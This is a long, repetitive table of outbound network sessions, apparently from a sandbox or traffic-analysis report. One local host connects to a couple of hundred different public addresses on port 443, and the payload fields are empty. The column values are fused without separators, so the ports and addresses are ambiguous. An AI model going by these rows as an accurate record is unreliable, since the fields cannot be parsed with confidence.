                                                12628192.168.2.1334556147.82.4.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12629192.168.2.133835064.11.46.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12630192.168.2.1350552132.88.108.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12631192.168.2.1343114121.210.43.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12632192.168.2.1358332208.105.195.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12633192.168.2.1351036169.178.220.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12634192.168.2.1335070188.88.244.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12635192.168.2.1352372186.1.191.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12636192.168.2.133290659.235.253.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12637192.168.2.1336718140.33.116.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12638192.168.2.1342782196.162.128.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12639192.168.2.134399477.112.33.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12640192.168.2.1342504110.12.179.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12641192.168.2.1352418117.104.16.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12642192.168.2.1339592122.8.94.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12643192.168.2.1344552166.18.214.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12644192.168.2.1354804106.44.98.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12645192.168.2.1344164103.162.225.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12646192.168.2.1341802111.163.128.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12647192.168.2.1343868221.175.133.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12648192.168.2.133331224.149.202.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12649192.168.2.1358744136.45.74.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12650192.168.2.1354198121.140.53.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12651192.168.2.1335126170.67.71.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12652192.168.2.1345092163.112.225.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12653192.168.2.1341406122.179.85.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12654192.168.2.134948271.64.31.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12655192.168.2.133942059.120.92.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12656192.168.2.1337236180.163.214.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12657192.168.2.1350974162.246.180.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12658192.168.2.1357838116.42.136.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12659192.168.2.1353162164.235.175.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12660192.168.2.1336168161.118.242.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12661192.168.2.1338456204.163.216.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12662192.168.2.133707231.74.203.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12663192.168.2.1333878113.157.219.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12664192.168.2.1338298122.90.151.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12665192.168.2.1333626165.209.120.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12666192.168.2.1333074190.132.128.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12667192.168.2.133930836.129.11.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12668192.168.2.1350808144.219.127.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12669192.168.2.1351210113.222.37.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12670192.168.2.1334110199.171.48.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12671192.168.2.134314295.200.95.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12672192.168.2.135788631.154.9.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12673192.168.2.133981646.229.46.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12674192.168.2.1335512116.58.98.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12675192.168.2.135016274.165.113.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12676192.168.2.1333778194.37.180.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12677192.168.2.133313441.199.184.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12678192.168.2.1337600100.214.93.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12679192.168.2.133580681.104.126.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12680192.168.2.133560864.64.172.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12681192.168.2.1335508160.235.175.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12682192.168.2.1335080209.208.211.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12683192.168.2.1346818153.57.17.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12684192.168.2.1340750143.49.202.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12685192.168.2.1334984119.223.227.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12686192.168.2.1336008128.17.221.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12687192.168.2.1348684213.41.77.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12688192.168.2.1360864156.216.192.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12689192.168.2.13344761.129.40.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12690192.168.2.1355048195.38.153.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12691192.168.2.1348292142.230.12.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12692192.168.2.135048218.100.6.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12693192.168.2.1344872194.136.23.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12694192.168.2.1349760133.168.210.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12695192.168.2.1353802139.1.80.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12696192.168.2.1341522195.12.255.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12697192.168.2.1341542124.84.222.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12698192.168.2.1354422145.45.194.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12699192.168.2.133896443.252.73.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12700192.168.2.1360022103.71.93.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12701192.168.2.1357890102.168.230.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12702192.168.2.134710898.95.234.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12703192.168.2.1357302113.56.45.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12704192.168.2.1348434191.140.34.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12705192.168.2.134347014.182.115.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12706192.168.2.1348308207.32.216.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12707192.168.2.1334512139.143.44.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12708192.168.2.13563384.214.73.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12709192.168.2.135430484.63.229.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12710192.168.2.1360014218.223.126.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12711192.168.2.133659458.160.244.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12712192.168.2.135323024.81.174.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12713192.168.2.1357696130.103.179.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12714192.168.2.134893447.118.63.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12715192.168.2.134087084.64.96.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12716192.168.2.133551232.126.26.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12717192.168.2.133728696.215.69.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12718192.168.2.1341674184.49.12.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12719192.168.2.1335482204.109.137.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12720192.168.2.1338308159.129.63.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12721192.168.2.1360112189.134.223.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12722192.168.2.1343842140.157.192.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12723192.168.2.1337374172.202.147.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12724192.168.2.1332882185.149.26.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12725192.168.2.133280297.234.36.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12726192.168.2.1344024134.132.199.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12727192.168.2.1341910121.14.98.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12728192.168.2.1333678107.238.111.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12729192.168.2.135347267.155.180.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12730192.168.2.133454279.6.43.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12731192.168.2.133609460.196.48.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12732192.168.2.1355066136.117.233.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12733192.168.2.1358506189.171.150.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12734192.168.2.1355080162.134.55.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12735192.168.2.1337058138.163.216.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12736192.168.2.1334092160.78.172.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12737192.168.2.134173646.172.185.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12738192.168.2.13528682.141.93.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12739192.168.2.1334908182.169.106.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12740192.168.2.135254462.215.55.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12741192.168.2.1349674100.32.121.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12742192.168.2.1357884143.179.18.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12743192.168.2.134337872.199.54.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12744192.168.2.135453437.138.102.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12745192.168.2.133833463.34.157.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12746192.168.2.1355986216.78.15.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12747192.168.2.1343174101.186.195.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12748192.168.2.1358294197.112.29.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12749192.168.2.134990825.109.77.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12750192.168.2.1347554158.37.192.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12751192.168.2.1340052114.159.220.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12752192.168.2.1354292134.181.168.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12753192.168.2.1359944114.180.84.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12754192.168.2.1342820144.17.34.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12755192.168.2.134814862.76.37.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12756192.168.2.133829868.126.51.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12757192.168.2.134192442.81.57.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12758192.168.2.1343240153.174.149.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12759192.168.2.1358084192.79.142.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12760192.168.2.135408245.19.213.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12761192.168.2.133724649.57.158.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12762192.168.2.134599436.66.46.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12763192.168.2.1333068192.106.129.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12764192.168.2.133429436.238.23.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12765192.168.2.135789867.30.231.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12766192.168.2.135027891.149.11.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12767192.168.2.135439445.109.165.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12768192.168.2.133935223.235.15.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12769192.168.2.1347532203.199.28.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12770192.168.2.1359264172.115.33.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12771192.168.2.1332824188.223.120.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12772192.168.2.134405032.8.25.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12773192.168.2.133336666.191.10.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12774192.168.2.1336644160.179.28.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12775192.168.2.134458072.14.6.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12776192.168.2.1336674181.9.106.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12777192.168.2.134354060.77.234.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12778192.168.2.133951059.180.19.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12779192.168.2.133873431.98.152.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12780192.168.2.134458653.62.194.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12781192.168.2.135986040.87.71.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12782192.168.2.135209875.137.129.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12783192.168.2.1358008170.126.177.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12784192.168.2.1338864170.98.233.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12785192.168.2.135206437.62.38.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12786192.168.2.1333998160.22.3.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12787192.168.2.133777857.215.232.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12788192.168.2.1345298160.74.77.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12789192.168.2.134847814.2.52.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12790192.168.2.1357240200.209.176.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12791192.168.2.1357956120.130.143.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12792192.168.2.1353950132.233.13.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12793192.168.2.134606663.51.244.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12794192.168.2.1360610207.39.248.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12795192.168.2.1344082118.248.150.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12796192.168.2.1360822112.16.204.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12797192.168.2.134926867.153.84.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12798192.168.2.133625288.215.211.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12799192.168.2.1353252106.152.255.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12800192.168.2.1333516206.162.140.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12801192.168.2.1352798167.228.229.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12802192.168.2.1357710192.107.235.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12803192.168.2.1337916173.34.192.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12804192.168.2.1349240116.107.178.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12805192.168.2.1348374205.119.146.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12806192.168.2.1354984114.154.120.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12807192.168.2.134212290.67.5.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12808192.168.2.1347972153.16.140.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12809192.168.2.1334766208.224.248.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12810192.168.2.1345670128.240.106.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12811192.168.2.135107427.111.15.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12812192.168.2.1348522207.122.98.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12813192.168.2.1354522116.15.137.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12814192.168.2.1342318165.204.17.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12815192.168.2.135659047.143.243.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12816192.168.2.134313034.194.9.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12817192.168.2.134927065.13.77.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12818192.168.2.1354388156.56.170.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12819192.168.2.133637052.151.67.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12820192.168.2.1344370101.170.175.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12821192.168.2.1341394133.207.197.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12822192.168.2.1336552168.189.126.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12823192.168.2.1349090197.97.151.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12824192.168.2.1357066172.124.103.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12825192.168.2.1359682135.12.143.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12826192.168.2.1338322131.168.52.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12827192.168.2.1354336138.92.170.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12828192.168.2.135244250.221.144.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12829192.168.2.1349534185.62.43.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12830192.168.2.136065258.52.69.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12831192.168.2.1337054220.81.66.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12832192.168.2.134454019.120.89.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12833192.168.2.135545031.120.150.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12834192.168.2.135947680.137.162.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12835192.168.2.1354480166.73.81.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12836192.168.2.1334706157.56.47.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12837192.168.2.1353708143.99.189.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12838192.168.2.136031890.201.43.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12839192.168.2.133960453.204.65.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12840192.168.2.134047043.48.67.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12841192.168.2.13338369.201.253.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12842192.168.2.1359676136.39.185.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12843192.168.2.1336232190.16.239.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12844192.168.2.134779024.187.184.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12845192.168.2.133362870.220.49.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12846192.168.2.134406460.212.220.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12847192.168.2.133608683.224.111.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12848192.168.2.1351494216.168.188.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12849192.168.2.134322619.183.185.13443
                                                TimestampBytes transferredDirectionData


